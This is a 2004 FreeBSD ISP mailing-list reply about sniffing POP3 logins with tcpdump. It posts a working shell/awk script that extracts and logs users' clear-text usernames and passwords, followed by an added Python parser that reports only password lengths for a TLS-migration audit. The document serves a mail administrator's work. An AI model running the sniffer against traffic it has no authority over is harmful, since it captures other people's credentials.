From owner-freebsd-isp@FreeBSD.ORG Tue Apr 13 13:10:57 2004
Received: from mail.albury.net.au (giroc.albury.NET.AU [203.15.244.13]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6B0E443D5F; Tue, 13 Apr 2004 13:10:56 -0700 (PDT) (envelope-from freebsd-lists@albury.net.au)
Date: Wed, 14 Apr 2004 06:10:49 +1000 (EST)
To: John Fox
cc: freebsd-isp@freebsd.org
In-Reply-To: <20040413180323.GA13554@mind.net>
Subject: Re: tcpdump for sniffing POP3 -- methods ?
List-Id: Internet Services Providers

On Tue, 13 Apr 2004, John Fox wrote:

> 2) Obtain them by sniffing the POP3 traffic being sent
> to the Imail server.
>
> I think #2 is the only possibility, and I haven't made much
> use of tcpdump, so while I do know how to run it and
> specify a host to listen to, I've no idea how to isolate
> the clear-text stuff (containing the usernames and passwords)
> from all the other traffic.
>
> Any suggestions would be greatly appreciated.

I had to do this some years back; here's the rude, crude and unattractive script I wrote then:

# cat sniff.pop.passwords
#!/bin/sh
log=sniffed.passwords.log
mailhost="mail"   # Hostname of whichever host receives your incoming mail
tcpdump -lnx -s 256 dst port 110 and host $mailhost 2>/dev/null | awk '
BEGIN { lut = "123456789abcdef" }           # index(lut, h) maps a hex digit to its value ("0" gives 0)
/>/   { IP = $2; n = 0; len = 0; c = "" }   # packet summary line: $2 is the source host.port
{
    # first hex line: the second 16-bit word is the IP total length
    if (n == 1)
        for (x = 1; x <= 4; x++)
            len = len * 16 + index(lut, substr($2, x, 1))
    # third hex line onwards: decode the 16-bit words into characters;
    # on that line start at word 5 (byte 40 = 20-byte IP header + 20-byte TCP header,
    # TCP options not handled), which is where the POP3 command begins
    if (++n > 3 && len > 20) {
        for (i = (n == 4) * 4 + 1; i <= NF; i++)
            c = sprintf("%s%c%c", c,
                        index(lut, substr($i, 1, 1)) * 16 + index(lut, substr($i, 2, 1)),
                        index(lut, substr($i, 3, 1)) * 16 + index(lut, substr($i, 4, 1)))
        # len - 40 is the payload length: act once the whole command has been decoded
        if (length(c) >= len - 40) {
            sub("\\.[0-9]*$", "", IP)       # strip the port suffix from host.port
            v = substr(c, 6); gsub("[^a-zA-Z0-9]", "", v)
            if (substr(c, 1, 5) == "USER ") usr[IP] = v
            if (substr(c, 1, 5) == "PASS " && usr[IP]) {
                # strftime() is a gawk extension
                printf("%s %-16.16s %10s - %s\n",
                       strftime("%d-%b-%Y %H:%M:%S"), IP, usr[IP], v)
                usr[IP] = ""
            }
        }
    }
}'
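The same isolation done offline, as an added example that is not code from the post or from tcpdump: a Python parser for the hex dump layout of current tcpdump -x (a summary line per packet followed by "0xNNNN:" lines), which strips the IP and TCP headers and reports which clients still send USER/PASS to port 110 in the clear. It keeps the username and only the length of the password, which is the view an administrator needs to decide which clients must be moved to POP3 over TLS. The dump, the addresses and the function and regex names below are constructed for this example.

```python
"""Added example: find clear-text POP3 logins in a tcpdump -x hex dump.

Assumes the current tcpdump -x layout; the sample dump is constructed.
"""
import re
from collections import defaultdict

# One summary line per packet ("src > dst: ..."), then the IPv4 packet as 16-bit hex words.
SUMMARY_RE = re.compile(r"^\S+ IP (\S+) > (\S+): ")
HEX_RE = re.compile(r"^\s+0x[0-9a-f]{4}:\s+((?:[0-9a-f]{2,4}\s*)+)$")


def split_packets(lines):
    """Yield (src, dst, raw_bytes) for every packet in a tcpdump -x dump."""
    src = dst = None
    words = []
    for line in lines:
        m = SUMMARY_RE.match(line)
        if m:
            if src is not None:
                yield src, dst, bytes.fromhex("".join(words))
            src, dst, words = m.group(1), m.group(2), []
            continue
        m = HEX_RE.match(line)
        if m and src is not None:
            words.append("".join(m.group(1).split()))
    if src is not None:
        yield src, dst, bytes.fromhex("".join(words))


def tcp_payload(raw):
    """Return the TCP payload of one IPv4/TCP packet (b'' if not TCP or truncated).

    Header lengths are read from the packet, so IP and TCP options are handled;
    a snaplen-truncated capture (e.g. -s 256) simply yields a shorter payload.
    """
    if len(raw) < 20 or raw[0] >> 4 != 4 or raw[9] != 6:
        return b""
    ihl = (raw[0] & 0x0F) * 4                 # IP header length, options included
    total = int.from_bytes(raw[2:4], "big")   # IP total length
    if len(raw) < ihl + 20:
        return b""
    doff = (raw[ihl + 12] >> 4) * 4           # TCP header length, options included
    return raw[ihl + doff:total]


def find_cleartext_logins(lines, pop3_port=110):
    """Map client IP -> [(username, password_length), ...] for clear-text logins."""
    suffix = f".{pop3_port}"
    pending = {}                        # client -> username waiting for its PASS
    found = defaultdict(list)
    for src, dst, raw in split_packets(lines):
        if not dst.endswith(suffix):    # only traffic towards the POP3 service
            continue
        client = src.rsplit(".", 1)[0]  # drop the source port from host.port
        for cmd in tcp_payload(raw).split(b"\r\n"):
            verb, _, arg = cmd.partition(b" ")
            if verb.upper() == b"USER":
                pending[client] = arg.decode("ascii", "replace")
            elif verb.upper() == b"PASS" and client in pending:
                # record the exposure, not the secret: only the password length is kept
                found[client].append((pending.pop(client), len(arg)))
    return dict(found)


def report(found):
    """One line per clear-text login, password redacted."""
    return [f"{ip:<16} {user:<10} password sent in clear ({n} chars)"
            for ip, logins in sorted(found.items()) for user, n in logins]


# Constructed dump: client .5 logs in as "alice" (password 6 chars), the server
# answers "+OK", and client .9 sends USER only, so it must not be reported.
SAMPLE_DUMP = """\
20:10:49.000001 IP 203.0.113.5.51234 > 198.51.100.7.110: Flags [P.], seq 1:13, ack 1, win 512, length 12
    0x0000:  4500 0034 0001 0000 4006 0000 cb00 7105
    0x0010:  c633 6407 c822 006e 0000 0001 0000 0001
    0x0020:  5018 0200 0000 0000 5553 4552 2061 6c69
    0x0030:  6365 0d0a
20:10:49.000002 IP 198.51.100.7.110 > 203.0.113.5.51234: Flags [P.], seq 1:6, ack 13, win 512, length 5
    0x0000:  4500 002d 0002 0000 4006 0000 c633 6407
    0x0010:  cb00 7105 006e c822 0000 0001 0000 000d
    0x0020:  5018 0200 0000 0000 2b4f 4b0d 0a
20:10:49.000003 IP 203.0.113.5.51234 > 198.51.100.7.110: Flags [P.], seq 13:26, ack 6, win 512, length 13
    0x0000:  4500 0035 0003 0000 4006 0000 cb00 7105
    0x0010:  c633 6407 c822 006e 0000 000d 0000 0006
    0x0020:  5018 0200 0000 0000 5041 5353 2073 3363
    0x0030:  7265 740d 0a
20:10:50.000004 IP 203.0.113.9.51235 > 198.51.100.7.110: Flags [P.], seq 1:11, ack 1, win 512, length 10
    0x0000:  4500 0032 0004 0000 4006 0000 cb00 7109
    0x0010:  c633 6407 c823 006e 0000 0001 0000 0001
    0x0020:  5018 0200 0000 0000 5553 4552 2062 6f62
    0x0030:  0d0a
"""

if __name__ == "__main__":
    for line in report(find_cleartext_logins(SAMPLE_DUMP.splitlines())):
        print(line)
```

Feed it a real dump with `tcpdump -nx 'tcp dst port 110' | python3 pop3_clear.py` after swapping SAMPLE_DUMP for sys.stdin; because the header offsets are read from the packet rather than fixed at byte 40, it also copes with TCP options, which the awk version does not.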